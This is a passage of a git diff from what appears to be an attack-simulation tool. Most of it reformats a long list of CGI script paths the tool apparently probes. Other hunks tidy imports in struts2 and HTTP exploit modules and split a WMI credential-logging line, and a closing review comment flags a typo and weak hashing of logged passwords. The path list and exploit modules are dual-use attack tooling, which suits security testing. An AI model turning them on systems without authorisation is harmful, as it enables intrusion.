r'/cgi-bin/FormHandler.cgi', - r'/cgi-bin/FormMail.cgi', - r'/cgi-bin/gbadmin.cgi', - r'/cgi-bin/gbook/gbook.cgi', - r'/cgi-bin/generate.cgi', - r'/cgi-bin/getdoc.cgi', - r'/cgi-bin/gH.cgi', - r'/cgi-bin/gm-authors.cgi', - r'/cgi-bin/gm.cgi', - r'/cgi-bin/gm-cplog.cgi', - r'/cgi-bin/guestbook.cgi', - r'/cgi-bin/handler', - r'/cgi-bin/handler.cgi', - r'/cgi-bin/handler/netsonar', - r'/cgi-bin/hitview.cgi', - r'/cgi-bin/hsx.cgi', - r'/cgi-bin/html2chtml.cgi', - r'/cgi-bin/html2wml.cgi', - r'/cgi-bin/htsearch.cgi', - r'/cgi-bin/hw.sh', # testing - r'/cgi-bin/icat', - r'/cgi-bin/if/admin/nph-build.cgi', - r'/cgi-bin/ikonboard/help.cgi', - r'/cgi-bin/ImageFolio/admin/admin.cgi', - r'/cgi-bin/imageFolio.cgi', - r'/cgi-bin/index.cgi', - r'/cgi-bin/infosrch.cgi', - r'/cgi-bin/jammail.pl', - r'/cgi-bin/journal.cgi', - r'/cgi-bin/lastlines.cgi', - r'/cgi-bin/loadpage.cgi', - r'/cgi-bin/login.cgi', - r'/cgi-bin/logit.cgi', - r'/cgi-bin/log-reader.cgi', - r'/cgi-bin/lookwho.cgi', - r'/cgi-bin/lwgate.cgi', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/magiccard.cgi', - r'/cgi-bin/mail/emumail.cgi', - r'/cgi-bin/maillist.cgi', - r'/cgi-bin/mailnews.cgi', - r'/cgi-bin/mail/nph-mr.cgi', - r'/cgi-bin/main.cgi', - r'/cgi-bin/main_menu.pl', - r'/cgi-bin/man.sh', - r'/cgi-bin/mini_logger.cgi', - r'/cgi-bin/mmstdod.cgi', - r'/cgi-bin/moin.cgi', - r'/cgi-bin/mojo/mojo.cgi', - r'/cgi-bin/mrtg.cgi', - r'/cgi-bin/mt.cgi', - r'/cgi-bin/mt/mt.cgi', - r'/cgi-bin/mt/mt-check.cgi', - r'/cgi-bin/mt/mt-load.cgi', - r'/cgi-bin/mt-static/mt-check.cgi', - r'/cgi-bin/mt-static/mt-load.cgi', - r'/cgi-bin/musicqueue.cgi', - r'/cgi-bin/myguestbook.cgi', - r'/cgi-bin/.namazu.cgi', - r'/cgi-bin/nbmember.cgi', - r'/cgi-bin/netauth.cgi', - r'/cgi-bin/netpad.cgi', - r'/cgi-bin/newsdesk.cgi', - r'/cgi-bin/nlog-smb.cgi', - r'/cgi-bin/nph-emumail.cgi', - r'/cgi-bin/nph-exploitscanget.cgi', - r'/cgi-bin/nph-publish.cgi', - r'/cgi-bin/nph-test.cgi', - r'/cgi-bin/pagelog.cgi', - 
r'/cgi-bin/pbcgi.cgi', - r'/cgi-bin/perlshop.cgi', - r'/cgi-bin/pfdispaly.cgi', - r'/cgi-bin/pfdisplay.cgi', - r'/cgi-bin/phf.cgi', - r'/cgi-bin/photo/manage.cgi', - r'/cgi-bin/photo/protected/manage.cgi', - r'/cgi-bin/php-cgi', - r'/cgi-bin/php.cgi', - r'/cgi-bin/php.fcgi', - r'/cgi-bin/ping.sh', - r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', - r'/cgi-bin/pollssi.cgi', - r'/cgi-bin/postcards.cgi', - r'/cgi-bin/powerup/r.cgi', - r'/cgi-bin/printenv', - r'/cgi-bin/probecontrol.cgi', - r'/cgi-bin/profile.cgi', - r'/cgi-bin/publisher/search.cgi', - r'/cgi-bin/quickstore.cgi', - r'/cgi-bin/quizme.cgi', - r'/cgi-bin/ratlog.cgi', - r'/cgi-bin/r.cgi', - r'/cgi-bin/register.cgi', - r'/cgi-bin/replicator/webpage.cgi/', - r'/cgi-bin/responder.cgi', - r'/cgi-bin/robadmin.cgi', - r'/cgi-bin/robpoll.cgi', - r'/cgi-bin/rtpd.cgi', - r'/cgi-bin/sbcgi/sitebuilder.cgi', - r'/cgi-bin/scoadminreg.cgi', - r'/cgi-bin-sdb/printenv', - r'/cgi-bin/sdbsearch.cgi', - r'/cgi-bin/search', - r'/cgi-bin/search.cgi', - r'/cgi-bin/search/search.cgi', - r'/cgi-bin/sendform.cgi', - r'/cgi-bin/shop.cgi', - r'/cgi-bin/shopper.cgi', - r'/cgi-bin/shopplus.cgi', - r'/cgi-bin/showcheckins.cgi', - r'/cgi-bin/simplestguest.cgi', - r'/cgi-bin/simplestmail.cgi', - r'/cgi-bin/smartsearch.cgi', - r'/cgi-bin/smartsearch/smartsearch.cgi', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/sojourn.cgi', - r'/cgi-bin/spin_client.cgi', - r'/cgi-bin/start.cgi', - r'/cgi-bin/status', - r'/cgi-bin/status_cgi', - r'/cgi-bin/store/agora.cgi', - r'/cgi-bin/store.cgi', - r'/cgi-bin/store/index.cgi', - r'/cgi-bin/survey.cgi', - r'/cgi-bin/sync.cgi', - r'/cgi-bin/talkback.cgi', - r'/cgi-bin/technote/main.cgi', - r'/cgi-bin/test2.pl', - r'/cgi-bin/test-cgi', - r'/cgi-bin/test.cgi', - r'/cgi-bin/testing_whatever', - r'/cgi-bin/test/test.cgi', - r'/cgi-bin/tidfinder.cgi', - r'/cgi-bin/tigvote.cgi', - r'/cgi-bin/title.cgi', - r'/cgi-bin/top.cgi', - 
r'/cgi-bin/traffic.cgi', - r'/cgi-bin/troops.cgi', - r'/cgi-bin/ttawebtop.cgi/', - r'/cgi-bin/ultraboard.cgi', - r'/cgi-bin/upload.cgi', - r'/cgi-bin/urlcount.cgi', - r'/cgi-bin/viewcvs.cgi', - r'/cgi-bin/view_help.cgi', - r'/cgi-bin/viralator.cgi', - r'/cgi-bin/virgil.cgi', - r'/cgi-bin/vote.cgi', - r'/cgi-bin/vpasswd.cgi', - r'/cgi-bin/way-board.cgi', - r'/cgi-bin/way-board/way-board.cgi', - r'/cgi-bin/webbbs.cgi', - r'/cgi-bin/webcart/webcart.cgi', - r'/cgi-bin/webdist.cgi', - r'/cgi-bin/webif.cgi', - r'/cgi-bin/webmail/html/emumail.cgi', - r'/cgi-bin/webmap.cgi', - r'/cgi-bin/webspirs.cgi', - r'/cgi-bin/Web_Store/web_store.cgi', - r'/cgi-bin/whois.cgi', - r'/cgi-bin/whois_raw.cgi', - r'/cgi-bin/whois/whois.cgi', - r'/cgi-bin/wrap', - r'/cgi-bin/wrap.cgi', - r'/cgi-bin/wwwboard.cgi.cgi', - r'/cgi-bin/YaBB/YaBB.cgi', - r'/cgi-bin/zml.cgi', - r'/cgi-mod/index.cgi', - r'/cgis/wwwboard/wwwboard.cgi', - r'/cgi-sys/addalink.cgi', - r'/cgi-sys/defaultwebpage.cgi', - r'/cgi-sys/domainredirect.cgi', - r'/cgi-sys/entropybanner.cgi', - r'/cgi-sys/entropysearch.cgi', - r'/cgi-sys/FormMail-clone.cgi', - r'/cgi-sys/helpdesk.cgi', - r'/cgi-sys/mchat.cgi', - r'/cgi-sys/randhtml.cgi', - r'/cgi-sys/realhelpdesk.cgi', - r'/cgi-sys/realsignup.cgi', - r'/cgi-sys/signup.cgi', - r'/connector.cgi', - r'/cp/rac/nsManager.cgi', - r'/create_release.sh', - r'/CSNews.cgi', - r'/csPassword.cgi', - r'/dcadmin.cgi', - r'/dcboard.cgi', - r'/dcforum.cgi', - r'/dcforum/dcforum.cgi', - r'/debuff.cgi', - r'/debug.cgi', - r'/details.cgi', - r'/edittag/edittag.cgi', - r'/emumail.cgi', - r'/enter_buff.cgi', - r'/enter_bug.cgi', - r'/ez2000/ezadmin.cgi', - r'/ez2000/ezboard.cgi', - r'/ez2000/ezman.cgi', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo2', - r'/fcgi-bin/echo2', - r'/Gozila.cgi', - r'/hitmatic/analyse.cgi', - r'/hp_docs/cgi-bin/index.cgi', - r'/html/cgi-bin/cgicso', - r'/html/cgi-bin/cgicso', - r'/index.cgi', - r'/info.cgi', - r'/infosrch.cgi', - r'/login.cgi', - 
r'/mailview.cgi', - r'/main.cgi', - r'/megabook/admin.cgi', - r'/ministats/admin.cgi', - r'/mods/apage/apage.cgi', - r'/_mt/mt.cgi', - r'/musicqueue.cgi', - r'/ncbook.cgi', - r'/newpro.cgi', - r'/newsletter.sh', - r'/oem_webstage/cgi-bin/oemapp_cgi', - r'/page.cgi', - r'/parse_xml.cgi', - r'/photodata/manage.cgi', - r'/photo/manage.cgi', - r'/print.cgi', - r'/process_buff.cgi', - r'/process_bug.cgi', - r'/pub/english.cgi', - r'/quikmail/nph-emumail.cgi', - r'/quikstore.cgi', - r'/reviews/newpro.cgi', - r'/ROADS/cgi-bin/search.pl', - r'/sample01.cgi', - r'/sample02.cgi', - r'/sample03.cgi', - r'/sample04.cgi', - r'/sampleposteddata.cgi', - r'/scancfg.cgi', - r'/scancfg.cgi', - r'/servers/link.cgi', - r'/setpasswd.cgi', - r'/SetSecurity.shm', - r'/shop/member_html.cgi', - r'/shop/normal_html.cgi', - r'/site_searcher.cgi', - r'/siteUserMod.cgi', - r'/submit.cgi', - r'/technote/print.cgi', - r'/template.cgi', - r'/test.cgi', - r'/ucsm/isSamInstalled.cgi', - r'/upload.cgi', - r'/userreg.cgi', - r'/users/scripts/submit.cgi', - r'/vood/cgi-bin/vood_view.cgi', - r'/Web_Store/web_store.cgi', - r'/webtools/bonsai/ccvsblame.cgi', - r'/webtools/bonsai/cvsblame.cgi', - r'/webtools/bonsai/cvslog.cgi', - r'/webtools/bonsai/cvsquery.cgi', - r'/webtools/bonsai/cvsqueryform.cgi', - r'/webtools/bonsai/showcheckins.cgi', - r'/wwwadmin.cgi', - r'/wwwboard.cgi', - r'/wwwboard/wwwboard.cgi') \ No newline at end of file +CGI_FILES = ( + r'/', + r'/admin.cgi', + r'/administrator.cgi', + r'/agora.cgi', + r'/aktivate/cgi-bin/catgy.cgi', + r'/analyse.cgi', + r'/apps/web/vs_diag.cgi', + r'/axis-cgi/buffer/command.cgi', + r'/b2-include/b2edit.showposts.php', + r'/bandwidth/index.cgi', + r'/bigconf.cgi', + r'/cartcart.cgi', + r'/cart.cgi', + r'/ccbill/whereami.cgi', + r'/cgi-bin/14all-1.1.cgi', + r'/cgi-bin/14all.cgi', + r'/cgi-bin/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp4.cgi', + r'/cgi-bin/addbanner.cgi', + r'/cgi-bin/add_ftp.cgi', + r'/cgi-bin/adduser.cgi', 
+ r'/cgi-bin/admin/admin.cgi', + r'/cgi-bin/admin.cgi', + r'/cgi-bin/admin/getparam.cgi', + r'/cgi-bin/adminhot.cgi', + r'/cgi-bin/admin.pl', + r'/cgi-bin/admin/setup.cgi', + r'/cgi-bin/adminwww.cgi', + r'/cgi-bin/af.cgi', + r'/cgi-bin/aglimpse.cgi', + r'/cgi-bin/alienform.cgi', + r'/cgi-bin/AnyBoard.cgi', + r'/cgi-bin/architext_query.cgi', + r'/cgi-bin/astrocam.cgi', + r'/cgi-bin/AT-admin.cgi', + r'/cgi-bin/AT-generate.cgi', + r'/cgi-bin/auction/auction.cgi', + r'/cgi-bin/auktion.cgi', + r'/cgi-bin/ax-admin.cgi', + r'/cgi-bin/ax.cgi', + r'/cgi-bin/axs.cgi', + r'/cgi-bin/badmin.cgi', + r'/cgi-bin/banner.cgi', + r'/cgi-bin/bannereditor.cgi', + r'/cgi-bin/bb-ack.sh', + r'/cgi-bin/bb-histlog.sh', + r'/cgi-bin/bb-hist.sh', + r'/cgi-bin/bb-hostsvc.sh', + r'/cgi-bin/bb-replog.sh', + r'/cgi-bin/bb-rep.sh', + r'/cgi-bin/bbs_forum.cgi', + r'/cgi-bin/bigconf.cgi', + r'/cgi-bin/bizdb1-search.cgi', + r'/cgi-bin/blog/mt-check.cgi', + r'/cgi-bin/blog/mt-load.cgi', + r'/cgi-bin/bnbform.cgi', + r'/cgi-bin/book.cgi', + r'/cgi-bin/boozt/admin/index.cgi', + r'/cgi-bin/bsguest.cgi', + r'/cgi-bin/bslist.cgi', + r'/cgi-bin/build.cgi', + r'/cgi-bin/bulk/bulk.cgi', + r'/cgi-bin/cached_feed.cgi', + r'/cgi-bin/cachemgr.cgi', + r'/cgi-bin/calendar/index.cgi', + r'/cgi-bin/cartmanager.cgi', + r'/cgi-bin/cbmc/forums.cgi', + r'/cgi-bin/ccvsblame.cgi', + r'/cgi-bin/c_download.cgi', + r'/cgi-bin/cgforum.cgi', + r'/cgi-bin/.cgi', + r'/cgi-bin/cgi_process', + r'/cgi-bin/classified.cgi', + r'/cgi-bin/classifieds.cgi', + r'/cgi-bin/classifieds/classifieds.cgi', + r'/cgi-bin/classifieds/index.cgi', + r'/cgi-bin/.cobalt/alert/service.cgi', + r'/cgi-bin/.cobalt/message/message.cgi', + r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', + r'/cgi-bin/commandit.cgi', + r'/cgi-bin/commerce.cgi', + r'/cgi-bin/common/listrec.pl', + r'/cgi-bin/compatible.cgi', + r'/cgi-bin/Count.cgi', + r'/cgi-bin/csChatRBox.cgi', + r'/cgi-bin/csGuestBook.cgi', + r'/cgi-bin/csLiveSupport.cgi', + r'/cgi-bin/CSMailto.cgi', + 
r'/cgi-bin/CSMailto/CSMailto.cgi', + r'/cgi-bin/csNews.cgi', + r'/cgi-bin/csNewsPro.cgi', + r'/cgi-bin/csPassword.cgi', + r'/cgi-bin/csPassword/csPassword.cgi', + r'/cgi-bin/csSearch.cgi', + r'/cgi-bin/csv_db.cgi', + r'/cgi-bin/cvsblame.cgi', + r'/cgi-bin/cvslog.cgi', + r'/cgi-bin/cvsquery.cgi', + r'/cgi-bin/cvsqueryform.cgi', + r'/cgi-bin/day5datacopier.cgi', + r'/cgi-bin/day5datanotifier.cgi', + r'/cgi-bin/db_manager.cgi', + r'/cgi-bin/dbman/db.cgi', + r'/cgi-bin/dcforum.cgi', + r'/cgi-bin/dcshop.cgi', + r'/cgi-bin/dfire.cgi', + r'/cgi-bin/diagnose.cgi', + r'/cgi-bin/dig.cgi', + r'/cgi-bin/directorypro.cgi', + r'/cgi-bin/download.cgi', + r'/cgi-bin/e87_Ba79yo87.cgi', + r'/cgi-bin/emu/html/emumail.cgi', + r'/cgi-bin/emumail.cgi', + r'/cgi-bin/emumail/emumail.cgi', + r'/cgi-bin/enter.cgi', + r'/cgi-bin/environ.cgi', + r'/cgi-bin/ezadmin.cgi', + r'/cgi-bin/ezboard.cgi', + r'/cgi-bin/ezman.cgi', + r'/cgi-bin/ezshopper2/loadpage.cgi', + r'/cgi-bin/ezshopper3/loadpage.cgi', + r'/cgi-bin/ezshopper/loadpage.cgi', + r'/cgi-bin/ezshopper/search.cgi', + r'/cgi-bin/faqmanager.cgi', + r'/cgi-bin/FileSeek2.cgi', + r'/cgi-bin/FileSeek.cgi', + r'/cgi-bin/finger.cgi', + r'/cgi-bin/flexform.cgi', + r'/cgi-bin/fom.cgi', + r'/cgi-bin/fom/fom.cgi', + r'/cgi-bin/FormHandler.cgi', + r'/cgi-bin/FormMail.cgi', + r'/cgi-bin/gbadmin.cgi', + r'/cgi-bin/gbook/gbook.cgi', + r'/cgi-bin/generate.cgi', + r'/cgi-bin/getdoc.cgi', + r'/cgi-bin/gH.cgi', + r'/cgi-bin/gm-authors.cgi', + r'/cgi-bin/gm.cgi', + r'/cgi-bin/gm-cplog.cgi', + r'/cgi-bin/guestbook.cgi', + r'/cgi-bin/handler', + r'/cgi-bin/handler.cgi', + r'/cgi-bin/handler/netsonar', + r'/cgi-bin/hitview.cgi', + r'/cgi-bin/hsx.cgi', + r'/cgi-bin/html2chtml.cgi', + r'/cgi-bin/html2wml.cgi', + r'/cgi-bin/htsearch.cgi', + r'/cgi-bin/hw.sh', # testing + r'/cgi-bin/icat', + r'/cgi-bin/if/admin/nph-build.cgi', + r'/cgi-bin/ikonboard/help.cgi', + r'/cgi-bin/ImageFolio/admin/admin.cgi', + r'/cgi-bin/imageFolio.cgi', + r'/cgi-bin/index.cgi', + 
r'/cgi-bin/infosrch.cgi',
+ r'/cgi-bin/jammail.pl',
+ r'/cgi-bin/journal.cgi',
+ r'/cgi-bin/lastlines.cgi',
+ r'/cgi-bin/loadpage.cgi',
+ r'/cgi-bin/login.cgi',
+ r'/cgi-bin/logit.cgi',
+ r'/cgi-bin/log-reader.cgi',
+ r'/cgi-bin/lookwho.cgi',
+ r'/cgi-bin/lwgate.cgi',
+ r'/cgi-bin/MachineInfo',
+ r'/cgi-bin/MachineInfo',
+ r'/cgi-bin/magiccard.cgi',
+ r'/cgi-bin/mail/emumail.cgi',
+ r'/cgi-bin/maillist.cgi',
+ r'/cgi-bin/mailnews.cgi',
+ r'/cgi-bin/mail/nph-mr.cgi',
+ r'/cgi-bin/main.cgi',
+ r'/cgi-bin/main_menu.pl',
+ r'/cgi-bin/man.sh',
+ r'/cgi-bin/mini_logger.cgi',
+ r'/cgi-bin/mmstdod.cgi',
+ r'/cgi-bin/moin.cgi',
+ r'/cgi-bin/mojo/mojo.cgi',
+ r'/cgi-bin/mrtg.cgi',
+ r'/cgi-bin/mt.cgi',
+ r'/cgi-bin/mt/mt.cgi',
+ r'/cgi-bin/mt/mt-check.cgi',
+ r'/cgi-bin/mt/mt-load.cgi',
+ r'/cgi-bin/mt-static/mt-check.cgi',
+ r'/cgi-bin/mt-static/mt-load.cgi',
+ r'/cgi-bin/musicqueue.cgi',
+ r'/cgi-bin/myguestbook.cgi',
+ r'/cgi-bin/.namazu.cgi',
+ r'/cgi-bin/nbmember.cgi',
+ r'/cgi-bin/netauth.cgi',
+ r'/cgi-bin/netpad.cgi',
+ r'/cgi-bin/newsdesk.cgi',
+ r'/cgi-bin/nlog-smb.cgi',
+ r'/cgi-bin/nph-emumail.cgi',
+ r'/cgi-bin/nph-exploitscanget.cgi',
+ r'/cgi-bin/nph-publish.cgi',
+ r'/cgi-bin/nph-test.cgi',
+ r'/cgi-bin/pagelog.cgi',
+ r'/cgi-bin/pbcgi.cgi',
+ r'/cgi-bin/perlshop.cgi',
+ r'/cgi-bin/pfdispaly.cgi',
+ r'/cgi-bin/pfdisplay.cgi',
+ r'/cgi-bin/phf.cgi',
+ r'/cgi-bin/photo/manage.cgi',
+ r'/cgi-bin/photo/protected/manage.cgi',
+ r'/cgi-bin/php-cgi',
+ r'/cgi-bin/php.cgi',
+ r'/cgi-bin/php.fcgi',
+ r'/cgi-bin/ping.sh',
+ r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
+ r'/cgi-bin/pollssi.cgi',
+ r'/cgi-bin/postcards.cgi',
+ r'/cgi-bin/powerup/r.cgi',
+ r'/cgi-bin/printenv',
+ r'/cgi-bin/probecontrol.cgi',
+ r'/cgi-bin/profile.cgi',
+ r'/cgi-bin/publisher/search.cgi',
+ r'/cgi-bin/quickstore.cgi',
+ r'/cgi-bin/quizme.cgi',
+ r'/cgi-bin/ratlog.cgi',
+ r'/cgi-bin/r.cgi',
+ r'/cgi-bin/register.cgi',
+ r'/cgi-bin/replicator/webpage.cgi/',
+ r'/cgi-bin/responder.cgi',
+ r'/cgi-bin/robadmin.cgi',
+ r'/cgi-bin/robpoll.cgi',
+ r'/cgi-bin/rtpd.cgi',
+ r'/cgi-bin/sbcgi/sitebuilder.cgi',
+ r'/cgi-bin/scoadminreg.cgi',
+ r'/cgi-bin-sdb/printenv',
+ r'/cgi-bin/sdbsearch.cgi',
+ r'/cgi-bin/search',
+ r'/cgi-bin/search.cgi',
+ r'/cgi-bin/search/search.cgi',
+ r'/cgi-bin/sendform.cgi',
+ r'/cgi-bin/shop.cgi',
+ r'/cgi-bin/shopper.cgi',
+ r'/cgi-bin/shopplus.cgi',
+ r'/cgi-bin/showcheckins.cgi',
+ r'/cgi-bin/simplestguest.cgi',
+ r'/cgi-bin/simplestmail.cgi',
+ r'/cgi-bin/smartsearch.cgi',
+ r'/cgi-bin/smartsearch/smartsearch.cgi',
+ r'/cgi-bin/snorkerz.bat',
+ r'/cgi-bin/snorkerz.bat',
+ r'/cgi-bin/snorkerz.cmd',
+ r'/cgi-bin/snorkerz.cmd',
+ r'/cgi-bin/sojourn.cgi',
+ r'/cgi-bin/spin_client.cgi',
+ r'/cgi-bin/start.cgi',
+ r'/cgi-bin/status',
+ r'/cgi-bin/status_cgi',
+ r'/cgi-bin/store/agora.cgi',
+ r'/cgi-bin/store.cgi',
+ r'/cgi-bin/store/index.cgi',
+ r'/cgi-bin/survey.cgi',
+ r'/cgi-bin/sync.cgi',
+ r'/cgi-bin/talkback.cgi',
+ r'/cgi-bin/technote/main.cgi',
+ r'/cgi-bin/test2.pl',
+ r'/cgi-bin/test-cgi',
+ r'/cgi-bin/test.cgi',
+ r'/cgi-bin/testing_whatever',
+ r'/cgi-bin/test/test.cgi',
+ r'/cgi-bin/tidfinder.cgi',
+ r'/cgi-bin/tigvote.cgi',
+ r'/cgi-bin/title.cgi',
+ r'/cgi-bin/top.cgi',
+ r'/cgi-bin/traffic.cgi',
+ r'/cgi-bin/troops.cgi',
+ r'/cgi-bin/ttawebtop.cgi/',
+ r'/cgi-bin/ultraboard.cgi',
+ r'/cgi-bin/upload.cgi',
+ r'/cgi-bin/urlcount.cgi',
+ r'/cgi-bin/viewcvs.cgi',
+ r'/cgi-bin/view_help.cgi',
+ r'/cgi-bin/viralator.cgi',
+ r'/cgi-bin/virgil.cgi',
+ r'/cgi-bin/vote.cgi',
+ r'/cgi-bin/vpasswd.cgi',
+ r'/cgi-bin/way-board.cgi',
+ r'/cgi-bin/way-board/way-board.cgi',
+ r'/cgi-bin/webbbs.cgi',
+ r'/cgi-bin/webcart/webcart.cgi',
+ r'/cgi-bin/webdist.cgi',
+ r'/cgi-bin/webif.cgi',
+ r'/cgi-bin/webmail/html/emumail.cgi',
+ r'/cgi-bin/webmap.cgi',
+ r'/cgi-bin/webspirs.cgi',
+ r'/cgi-bin/Web_Store/web_store.cgi',
+ r'/cgi-bin/whois.cgi',
+ r'/cgi-bin/whois_raw.cgi',
+ r'/cgi-bin/whois/whois.cgi',
+ r'/cgi-bin/wrap',
+ r'/cgi-bin/wrap.cgi',
+ r'/cgi-bin/wwwboard.cgi.cgi',
+ r'/cgi-bin/YaBB/YaBB.cgi',
+ r'/cgi-bin/zml.cgi',
+ r'/cgi-mod/index.cgi',
+ r'/cgis/wwwboard/wwwboard.cgi',
+ r'/cgi-sys/addalink.cgi',
+ r'/cgi-sys/defaultwebpage.cgi',
+ r'/cgi-sys/domainredirect.cgi',
+ r'/cgi-sys/entropybanner.cgi',
+ r'/cgi-sys/entropysearch.cgi',
+ r'/cgi-sys/FormMail-clone.cgi',
+ r'/cgi-sys/helpdesk.cgi',
+ r'/cgi-sys/mchat.cgi',
+ r'/cgi-sys/randhtml.cgi',
+ r'/cgi-sys/realhelpdesk.cgi',
+ r'/cgi-sys/realsignup.cgi',
+ r'/cgi-sys/signup.cgi',
+ r'/connector.cgi',
+ r'/cp/rac/nsManager.cgi',
+ r'/create_release.sh',
+ r'/CSNews.cgi',
+ r'/csPassword.cgi',
+ r'/dcadmin.cgi',
+ r'/dcboard.cgi',
+ r'/dcforum.cgi',
+ r'/dcforum/dcforum.cgi',
+ r'/debuff.cgi',
+ r'/debug.cgi',
+ r'/details.cgi',
+ r'/edittag/edittag.cgi',
+ r'/emumail.cgi',
+ r'/enter_buff.cgi',
+ r'/enter_bug.cgi',
+ r'/ez2000/ezadmin.cgi',
+ r'/ez2000/ezboard.cgi',
+ r'/ez2000/ezman.cgi',
+ r'/fcgi-bin/echo',
+ r'/fcgi-bin/echo',
+ r'/fcgi-bin/echo2',
+ r'/fcgi-bin/echo2',
+ r'/Gozila.cgi',
+ r'/hitmatic/analyse.cgi',
+ r'/hp_docs/cgi-bin/index.cgi',
+ r'/html/cgi-bin/cgicso',
+ r'/html/cgi-bin/cgicso',
+ r'/index.cgi',
+ r'/info.cgi',
+ r'/infosrch.cgi',
+ r'/login.cgi',
+ r'/mailview.cgi',
+ r'/main.cgi',
+ r'/megabook/admin.cgi',
+ r'/ministats/admin.cgi',
+ r'/mods/apage/apage.cgi',
+ r'/_mt/mt.cgi',
+ r'/musicqueue.cgi',
+ r'/ncbook.cgi',
+ r'/newpro.cgi',
+ r'/newsletter.sh',
+ r'/oem_webstage/cgi-bin/oemapp_cgi',
+ r'/page.cgi',
+ r'/parse_xml.cgi',
+ r'/photodata/manage.cgi',
+ r'/photo/manage.cgi',
+ r'/print.cgi',
+ r'/process_buff.cgi',
+ r'/process_bug.cgi',
+ r'/pub/english.cgi',
+ r'/quikmail/nph-emumail.cgi',
+ r'/quikstore.cgi',
+ r'/reviews/newpro.cgi',
+ r'/ROADS/cgi-bin/search.pl',
+ r'/sample01.cgi',
+ r'/sample02.cgi',
+ r'/sample03.cgi',
+ r'/sample04.cgi',
+ r'/sampleposteddata.cgi',
+ r'/scancfg.cgi',
+ r'/scancfg.cgi',
+ r'/servers/link.cgi',
+ r'/setpasswd.cgi',
+ r'/SetSecurity.shm',
+ r'/shop/member_html.cgi',
+ r'/shop/normal_html.cgi',
+ r'/site_searcher.cgi',
+ r'/siteUserMod.cgi',
+ r'/submit.cgi',
+ r'/technote/print.cgi',
+ r'/template.cgi',
+ r'/test.cgi',
+ r'/ucsm/isSamInstalled.cgi',
+ r'/upload.cgi',
+ r'/userreg.cgi',
+ r'/users/scripts/submit.cgi',
+ r'/vood/cgi-bin/vood_view.cgi',
+ r'/Web_Store/web_store.cgi',
+ r'/webtools/bonsai/ccvsblame.cgi',
+ r'/webtools/bonsai/cvsblame.cgi',
+ r'/webtools/bonsai/cvslog.cgi',
+ r'/webtools/bonsai/cvsquery.cgi',
+ r'/webtools/bonsai/cvsqueryform.cgi',
+ r'/webtools/bonsai/showcheckins.cgi',
+ r'/wwwadmin.cgi',
+ r'/wwwboard.cgi',
+ r'/wwwboard/wwwboard.cgi'
+)
diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py
index fc2fd764d..9aba749a7 100644
--- a/monkey/infection_monkey/exploit/struts2.py
+++ b/monkey/infection_monkey/exploit/struts2.py
@@ -3,13 +3,14 @@ code used is from https://www.exploit-db.com/exploits/41570/ Vulnerable struts2 versions <=2.3.31 and <=2.5.10 """
-import urllib.request, urllib.error, urllib.parse
 import http.client
-import unicodedata
+import logging
 import re
 import ssl
+import urllib.error
+import urllib.parse
+import urllib.request
-import logging
 from infection_monkey.exploit.web_rce import WebRCE
 __author__ = "VakarisZ"
diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py
index 297e064fc..b31e67137 100644
--- a/monkey/infection_monkey/exploit/tools/http_tools.py
+++ b/monkey/infection_monkey/exploit/tools/http_tools.py
@@ -1,14 +1,16 @@ import logging import os import os.path -import urllib.request, urllib.parse, urllib.error +import urllib.error +import urllib.parse +import urllib.request from threading import Lock +from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target +from infection_monkey.model import DOWNLOAD_TIMEOUT from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port from infection_monkey.transport import HTTPServer, LockedHTTPServer -from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target -from infection_monkey.model import DOWNLOAD_TIMEOUT __author__ = 'itamar' diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index a1da97efe..257cfd469 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -39,7 +39,8 @@ class WmiExploiter(HostExploiter): password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) - creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) + creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ + "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py index 88b7f9fd9..928425535 100644 --- a/monkey/infection_monkey/main.py +++ b/monkey/infection_monkey/main.py @@ -1,5 +1,3 @@ - - import argparse import json import logging 
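Review bot: `mtlm_hash_hashed` on the third assignment line of the wmiexec hunk is a typo for `ntlm_hash_hashed`, and since the reformat already rewrites the `.format(...)` statement that consumes it, this is the moment to rename both: `ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)`. Separately, the debug line logs the username in clear and the password as whatever `hash_sensitive_data` returns; if that is a plain unsalted SHA-512 (its implementation is not in the diff), a short or dictionary password is recoverable offline from the log, so a keyed hash or a digest truncated to a few hex characters — enough to correlate attempts, not enough to crack — would be safer. The `WmiExploiter` method containing this hunk starts outside the hunk.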
